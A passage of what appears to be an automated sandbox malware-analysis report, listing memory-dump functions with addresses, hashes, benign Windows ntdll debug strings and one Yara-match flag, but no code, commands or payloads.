                    • Instruction ID: c02d3fa85f2e493c8909c4aa31d91d8fa08ff0dda9f13524189d1105a4dda60e
                    • Opcode Fuzzy Hash: 2b192ee70f00a65816bf375ddfb21aae1d66be1eba028a6bb7b2e31c8a4fd935
                    • Instruction Fuzzy Hash: 0BC18FB1D00219DFEB26DF99D885AFDBBB5FF48740F144029E585AB290D738A941CF60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0100FAB0, Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                    Download Yara Rule
                    Strings
                    • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0104BE0F
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                    • API String ID: 0-865735534
                    • Opcode ID: fe98c2ee6f09b977fe2896a5d3e4939474907dc5f34a38ef5a2a4d3c7d70d415
                    • Instruction ID: 47c06ccf40ecdeb5e6e2d505d2f9d3b352282d8528c0b47a754f7c2d6cb3151b
                    • Opcode Fuzzy Hash: fe98c2ee6f09b977fe2896a5d3e4939474907dc5f34a38ef5a2a4d3c7d70d415
                    • Instruction Fuzzy Hash: 35A1E571B006078BE776DB69C891B7AB7E5AF44710F0445B9E986CB6C1DB34D801DB40
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00FD2D8A, Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: RTL: Re-Waiting
                    • API String ID: 0-316354757
                    • Opcode ID: bc9061861f22fc1ddfb80703a0c2243a4c21788d15c7e7cbb60697cb24ca2189
                    • Instruction ID: 052e6ce46954808fee4d31695a8451447b96dd64b06613919ce7c91f6b32714f
                    • Opcode Fuzzy Hash: bc9061861f22fc1ddfb80703a0c2243a4c21788d15c7e7cbb60697cb24ca2189
                    • Instruction Fuzzy Hash: 4E614571A006569FDB72DB68C840BBEB7F6EF54760F2806AAE991973C1C7349D00A7C1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 010A0EA5, Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: `
                    • API String ID: 0-2679148245
                    • Opcode ID: 7629fc638dc7728a310832cc94ed9c3563e6fa329cade89433d9d88ca946a95d
                    • Instruction ID: 742a30f7472462cdb6c4ba11d1ce1ac04b09f0f7486f48cc162d6f527b9d3821
                    • Opcode Fuzzy Hash: 7629fc638dc7728a310832cc94ed9c3563e6fa329cade89433d9d88ca946a95d
                    • Instruction Fuzzy Hash: 9551CB703083428FE324DF68D984F6BBBE9EB84714F44496CFAD697290D671E805CB62
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0100F0BF, Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: @
                    • API String ID: 0-2766056989
                    • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                    • Instruction ID: dddd91ebb1ff038cc2c5a1127ac9402f0203cda0c1ad6eaa67850bbe4207eccf
                    • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                    • Instruction Fuzzy Hash: A9519D71504711AFD321DF29C841AABBBF8FF48710F00892EFA95976A0E7B4E914CB91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01053540, Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: BinaryHash
                    • API String ID: 0-2202222882
                    • Opcode ID: cdaf8efcb8a0ca742340a348bba2c0eae77e00dcf461f1c06875f290f7bcb250
                    • Instruction ID: cca81e834d0aa4652429be880cf515cccb48efd0aa2334fd1d71db5373450d2c
                    • Opcode Fuzzy Hash: cdaf8efcb8a0ca742340a348bba2c0eae77e00dcf461f1c06875f290f7bcb250
                    • Instruction Fuzzy Hash: 684154F2D0052D9BDB61DA50CC80FEFB77CAB44754F0085A5EA49AB240DB359E888FA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 010A05AC, Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: `
                    • API String ID: 0-2679148245
                    • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                    • Instruction ID: 3c4ecdc78f6fdc80f6781662aa65e0453f1b16e3392f1f4e5a836071ce4b294a
                    • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                    • Instruction Fuzzy Hash: 6731133270430AABE720DE68CD44F9B7BD9FB88758F144228FA84DB284D770E904CB91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01053884, Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: BinaryName
                    • API String ID: 0-215506332
                    • Opcode ID: 31c9bd7ad730ec22a8dbb2d76e3e167d2ef115dd102c1ac241613aa676e63bb8
                    • Instruction ID: 2aa362050bccfc6f71b541213973423753092f640262bc5896d63739375fe598
                    • Opcode Fuzzy Hash: 31c9bd7ad730ec22a8dbb2d76e3e167d2ef115dd102c1ac241613aa676e63bb8
                    • Instruction Fuzzy Hash: 5B3105B290060AAFEB56DA58C945DBFFBB4FF80B60F014169ED84AB251D7319E00C7A0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0100D294, Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: @
                    • API String ID: 0-2766056989
                    • Opcode ID: 86dcea531cefc1a5ad84caf7bbe01a4984adbf454f7c690e83f351d2169c725c
                    • Instruction ID: f9e4bdd53dabf0d7eee0c897eaa970ac8ccf250e52f5130f2a0b31743a848f65
                    • Opcode Fuzzy Hash: 86dcea531cefc1a5ad84caf7bbe01a4984adbf454f7c690e83f351d2169c725c
                    • Instruction Fuzzy Hash: 7A31B3B15083059FD352DFA8C8809AFBBE8EF85754F00492EF9D483290D635DD04CBA2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00FE1B8F, Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: WindowsExcludedProcs
                    • API String ID: 0-3583428290
                    • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                    • Instruction ID: 6f57821f41cefd21e10bd470a84fbfde56a87d8c575e10c227617ee4ab459e10
                    • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                    • Instruction Fuzzy Hash: 5721257BA41668EBDB219A5F8940FEBB7ADBF81720F250061FA44CB200D634DD00E7A0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00FFF716, Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: Actx
                    • API String ID: 0-89312691
                    • Opcode ID: ebc1fca2dcf54782982ed879b77e7da528d151221af2563351629a51de675be7
                    • Instruction ID: 061fd2d97d2976bbf6fff668ad85acc277dbbc82aff60b0497da3a50d31d6d74
                    • Opcode Fuzzy Hash: ebc1fca2dcf54782982ed879b77e7da528d151221af2563351629a51de675be7
                    • Instruction Fuzzy Hash: D511D037B0460A8BEB246E1D8490736F295AF95B34F38453AE661DB3B1DA70DC09B340
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01088DF1, Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                    Download Yara Rule
                    Strings
                    • Critical error detected %lx, xrefs: 01088E21
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: Critical error detected %lx
                    • API String ID: 0-802127002
                    • Opcode ID: 258ed7718e1ee04e441496dee760f11e61d299de65a59db361082d5b472695f5
                    • Instruction ID: 0361adedab41bbdd08cd60a1432c135816dce31f738386f09976f827e5586acb
                    • Opcode Fuzzy Hash: 258ed7718e1ee04e441496dee760f11e61d299de65a59db361082d5b472695f5
                    • Instruction Fuzzy Hash: 86113971D14348DADF25EFA889057DDBBB0BB14314F20829EE5A9AB2D2C3344A01CF14
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0106FF10, Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                    Download Yara Rule
                    Strings
                    • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0106FF60
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                    • API String ID: 0-1911121157
                    • Opcode ID: 5bd03d0ad47d7684f2c1f028501b686f6c2c54eab4149e2a48456aea4f188ad1
                    • Instruction ID: 5397737395fd019cc447fcce6096550424c1fa647ba4aa82bbc339bec17313a6
                    • Opcode Fuzzy Hash: 5bd03d0ad47d7684f2c1f028501b686f6c2c54eab4149e2a48456aea4f188ad1
                    • Instruction Fuzzy Hash: 50110071910145EFEB62EB54CD89FD8BBF1FF08704F248088F5886B2A1C7399A40DB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00416CEA, Relevance: 1.3, Strings: 1, Instructions: 12COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000011.00000002.376958826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: _F%5
                    • API String ID: 0-2021467486
                    • Opcode ID: ce1c5c7af8f5c857e5b7c8545b904c4349d995330e7b74d864ceabfce36e1b1a
                    • Instruction ID: cb41f2a5ff32e5c263c32b2f74fbb769bac1c4c75982456e57259edae75ad696
                    • Opcode Fuzzy Hash: ce1c5c7af8f5c857e5b7c8545b904c4349d995330e7b74d864ceabfce36e1b1a
                    • Instruction Fuzzy Hash: 7FB01237F460080B80145E0978000B0F374D3C7035F5073E3CE1CB76061092CC2941CC
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 010A5BA5, Relevance: .6, Instructions: 592COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 920588bd2592f668a0c091eb6aaed937715cac969d6b47214d8c4d41fb7153cf
                    • Instruction ID: 7ff43917bee58570fbafe242d4cd6c74e987858e45ca228dd8965e6e197791e9
                    • Opcode Fuzzy Hash: 920588bd2592f668a0c091eb6aaed937715cac969d6b47214d8c4d41fb7153cf
                    • Instruction Fuzzy Hash: 4E425B75900229CFDB64CFA8C880BA9BBF1FF45304F5881EAD98DAB242D7359985CF50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00FF4120, Relevance: .4, Instructions: 444COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ee8a032c2d7bc841d882c352c305676acef22f0dae5c5d4e18d79998b0ece43e
                    • Instruction ID: aafbde3b531272cc2e5224c9c4046594186cb0e03b6f852c60ae2474dc7d8394
                    • Opcode Fuzzy Hash: ee8a032c2d7bc841d882c352c305676acef22f0dae5c5d4e18d79998b0ece43e
                    • Instruction Fuzzy Hash: F5F18C719082158FC724DF19C480A7BB7E1FF98714F14496EFA86CB2A0E734E885EB52
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 010020A0, Relevance: .4, Instructions: 420COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 352549c2dc4f3e4ac2059eb91e94c80dee94f3ec2b5c9ae618482a4594c0c7a8
                    • Instruction ID: 1bd94760b298c833ddd45a783d1d59848cfe02981fcfe8be30a7bacbcc000022
                    • Opcode Fuzzy Hash: 352549c2dc4f3e4ac2059eb91e94c80dee94f3ec2b5c9ae618482a4594c0c7a8
                    • Instruction Fuzzy Hash: 0DF1F0756083419FEB67CB2CC8847AA7BE1AF85724F0485ADE9D59B281D735D840CB82
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00FED5E0, Relevance: .4, Instructions: 353COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e179dcfaa288b96af6570cede0650f1da2ffc1e5f4289cb35376660c9a367d94
                    • Instruction ID: 9b1e4e7c2e7c62e4a2f9f1de4c0817c08ff141e6e42b4f6e6622f9142d889917
                    • Opcode Fuzzy Hash: e179dcfaa288b96af6570cede0650f1da2ffc1e5f4289cb35376660c9a367d94
                    • Instruction Fuzzy Hash: E7E10631A00399CFEB34DF1AC840BA9B7B6BF85318F1441E9D9899B691DB34AD81DF41
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00FE849B, Relevance: .3, Instructions: 290COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 410d380460bb9a44d62b672680b4f52f408f03f14b90f34ce14aa309345e8e40
                    • Instruction ID: dc232f639b6a64270a192f9d7d0b62564ac780876a657ea98097cc841b83be80
                    • Opcode Fuzzy Hash: 410d380460bb9a44d62b672680b4f52f408f03f14b90f34ce14aa309345e8e40
                    • Instruction Fuzzy Hash: E2B16F71E00349DFDB14EF99C980AADBBB9FF84344F204129E509AB255DB74AD42DF90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0100513A, Relevance: .3, Instructions: 258COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 719309bff25fa196315e532934fb89bde21c24ca0a9a77e27af38dfc65c6a62b
                    • Instruction ID: e6951c10bf6222f886653c9cd1a22e48dfc07b05240438ea03977d8f851dc065
                    • Opcode Fuzzy Hash: 719309bff25fa196315e532934fb89bde21c24ca0a9a77e27af38dfc65c6a62b
                    • Instruction Fuzzy Hash: A8C112B55083818FD355CF28C480A5AFBE1BF89304F144AAEF9D98B392D775E945CB42
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 010003E2, Relevance: .3, Instructions: 254COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 886940667e827ce864134b76ba38c3be414e48262db6536fafe7241c4f25ae41
                    • Instruction ID: 50a23aa5f8bb583688a69e9cd5ab7799cb7dd5e9393a987b851f2c935b668ee5
                    • Opcode Fuzzy Hash: 886940667e827ce864134b76ba38c3be414e48262db6536fafe7241c4f25ae41
                    • Instruction Fuzzy Hash: 6D9118B1E006599FFB329B6CC884BAE7BE4AB01754F0502A1FAD0E72D5DB799D00C785
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00FDC600, Relevance: .2, Instructions: 225COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b6a2d88507309ec2f61727134e4f6213f5e52e643fb6dab9feeb7d48c6bb5ea3
                    • Instruction ID: 005d34ed3830eba8a6487b55ab79611a1d065141d39aa26ca53eae1f98e382d9
                    • Opcode Fuzzy Hash: b6a2d88507309ec2f61727134e4f6213f5e52e643fb6dab9feeb7d48c6bb5ea3
                    • Instruction Fuzzy Hash: EC819EB56442429BDB66CE58C8C0B6AB7E5EF84354F1548BAEE859B241D330ED40CBE2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0100138B, Relevance: .2, Instructions: 206COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1c33f6d9e34d70ec2c7411a2d2e90e11e394967e8af468a76c92d51e73907bb8
                    • Instruction ID: fd415b7e27717648420f66087d2cd7a3bc8cda82308061aa875ad5df14b92a03
                    • Opcode Fuzzy Hash: 1c33f6d9e34d70ec2c7411a2d2e90e11e394967e8af468a76c92d51e73907bb8
                    • Instruction Fuzzy Hash: 0A818BB1A007459FDB25CF68C890BAABBF5FF48300F148569E996C7691D734EA41CBA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0106B8D0, Relevance: .2, Instructions: 199COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a319fb12f6091bc58f12467adc4547bbf5be50cb84dcc3316165f9a1670087d7
                    • Instruction ID: a97656c1a9a97e47fdda145c90bf925d2cc55bd4e98ce58ba7c3e6a61b0acfa3
                    • Opcode Fuzzy Hash: a319fb12f6091bc58f12467adc4547bbf5be50cb84dcc3316165f9a1670087d7
                    • Instruction Fuzzy Hash: C971EEB2340702AFE7329F18C845F6ABBE9EF40720F144568E695D76A1DBB5E940CB50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01056DC9, Relevance: .2, Instructions: 199COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                    • Instruction ID: 351994a1d9159e6fe8f103b7f03b933d6ea0d04344f20a8589f844df616b16d4
                    • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                    • Instruction Fuzzy Hash: 15717B71E00219EFDB51DFA8C984AEEBBF9FF48700F504069EA44E7251DB34AA41DB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00FD52A5, Relevance: .2, Instructions: 161COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 72640a942f15bb57e6a0b199bcd3d9b4c7adb6ebe05f9f7ec6e02482e49366ff
                    • Instruction ID: 55dc50dfda5445fb49e43d211a81cc2a4de722fac40c0b2a47be0add5e6c0557
                    • Opcode Fuzzy Hash: 72640a942f15bb57e6a0b199bcd3d9b4c7adb6ebe05f9f7ec6e02482e49366ff
                    • Instruction Fuzzy Hash: 2B51BB312057429BD321EF68C845B6BBBE9FF90B10F14091EF4D587651E775E804EB92
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01002AE4, Relevance: .2, Instructions: 159COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 02b6c2c5a959457c7ed6e64bf5d82c49385a966150788256db00320a0a033016
                    • Instruction ID: 8d735be478a7e2abb5bed973b125d0662b992c27e5256555472908f0a6c85f78
                    • Opcode Fuzzy Hash: 02b6c2c5a959457c7ed6e64bf5d82c49385a966150788256db00320a0a033016
                    • Instruction Fuzzy Hash: DC51C376E00525CFDB25DF1CC8889BDB7F1FB88700B19845AE8C69B395D735AA81CB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0109AE44, Relevance: .2, Instructions: 152COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b9d4910ea7c9b8708b1924c9981c6f0dc4e98263a2276a01c9baa403dafec7a1
                    • Instruction ID: 1b81fc345461706e90197cf05d3b5168329c8644dd51ccab7c20201a8c67bc53
                    • Opcode Fuzzy Hash: b9d4910ea7c9b8708b1924c9981c6f0dc4e98263a2276a01c9baa403dafec7a1
                    • Instruction Fuzzy Hash: AA41F4B1700215DBEF269A69C8B4B7BB7DAEF84720F048259F9D6876D0DB34D801E690
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00FFDBE9, Relevance: .1, Instructions: 149COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 61268a24d89636874a38c29f7c5c1335fc5e74437fe58b47aae8fba524784e6a
                    • Instruction ID: 62487fbaa1551a0690f4b8725aafad0e3fef09ebbe07c4ece9c0d817c8d062d2
                    • Opcode Fuzzy Hash: 61268a24d89636874a38c29f7c5c1335fc5e74437fe58b47aae8fba524784e6a
                    • Instruction Fuzzy Hash: BF519E71E01219CFCB14CF68C480BAEBBF6BF48310F24815ADA95AB354DB75AD44DB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00FEEF40, Relevance: .1, Instructions: 147COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                    • Instruction ID: f1b28a8debbeb138c24b300a4ea32a5f40c74328bb777f13cb63146b4c032260
                    • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                    • Instruction Fuzzy Hash: F5511231E042C9DFDB24CB6AD0907AEBBF1AF45324F2881B9D54593282C375AD89E741
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 010A740D, Relevance: .1, Instructions: 141COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                    • Instruction ID: 1607d467a6f7e4533e0ffb33a2bd3c5587f25b88b5533f6128c1ea7aa3d35e34
                    • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                    • Instruction Fuzzy Hash: C8517E71500646DFDB16CF68C480A96FBF5FF45304F54C1AAE9489F212E7B2E946CB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01002990, Relevance: .1, Instructions: 133COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 6e6a09af2c55ed0ff096e5e0d958fc707ab36fbfe6c341164c3d49761e654e20
                    • Instruction ID: 9c2abc00db8137b682977b7654a013a387936fd68d0a5da72171d13cd467d511
                    • Opcode Fuzzy Hash: 6e6a09af2c55ed0ff096e5e0d958fc707ab36fbfe6c341164c3d49761e654e20
                    • Instruction Fuzzy Hash: 58519D7190021ADFEF26DF99C884ADEBBB5FF08310F158055E944AB2A0C7359D92CFA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01004BAD, Relevance: .1, Instructions: 131COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b5cdcd3e71141b33ee3770123f41e590340610065ac217224d302408a3130aa2
                    • Instruction ID: 48db69e760a022ea9a0a5854ee8cb62632721cac9a16c07c4c3312354887f747
                    • Opcode Fuzzy Hash: b5cdcd3e71141b33ee3770123f41e590340610065ac217224d302408a3130aa2
                    • Instruction Fuzzy Hash: E9418175A002289BDB62DF68C981FEE77F4BF45710F0100A5EA48AB241E7799E84CB94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01004D3B, Relevance: .1, Instructions: 131COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: dcf615133a88f5fcb26f6ca4be587785a99bc14f8059c9cd9276dc854308da96
                    • Instruction ID: de02d536d7751786ac6ab51d87dea98f5a17b35f059e799e96e20380be5f23c1
                    • Opcode Fuzzy Hash: dcf615133a88f5fcb26f6ca4be587785a99bc14f8059c9cd9276dc854308da96
                    • Instruction Fuzzy Hash: 7941D271A443589FEB22DF18CC80BAAB7A9EB45710F0040AAEA85DB281D775ED44CB95
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00FE8A0A, Relevance: .1, Instructions: 120COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0bc5e67eb7decb0d4355b183befedf5ee766500af874c0fd49b245e481b28acc
                    • Instruction ID: 64773ca8d58ed63a62d950d95a9b5ceea725949879d57ab48e4b2cadf19bea12
                    • Opcode Fuzzy Hash: 0bc5e67eb7decb0d4355b183befedf5ee766500af874c0fd49b245e481b28acc
                    • Instruction Fuzzy Hash: D94181B1A0026C9BDB24EF16CC88AA9B3F4FB94750F1041EAD80DD7252DB749E81DF50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0109AA16, Relevance: .1, Instructions: 120COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                    • Instruction ID: ecc93b8fea251d1b797ec037056d20df049fed37176c85f5968cc11a2e461c80
                    • Opcode Fuzzy Hash: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                    • Instruction Fuzzy Hash: 8A312632F00219ABEF159B69CC65BBFFBBADF84210F0584A9E984A7252DB748D00D650
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0109FDE2, Relevance: .1, Instructions: 116COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
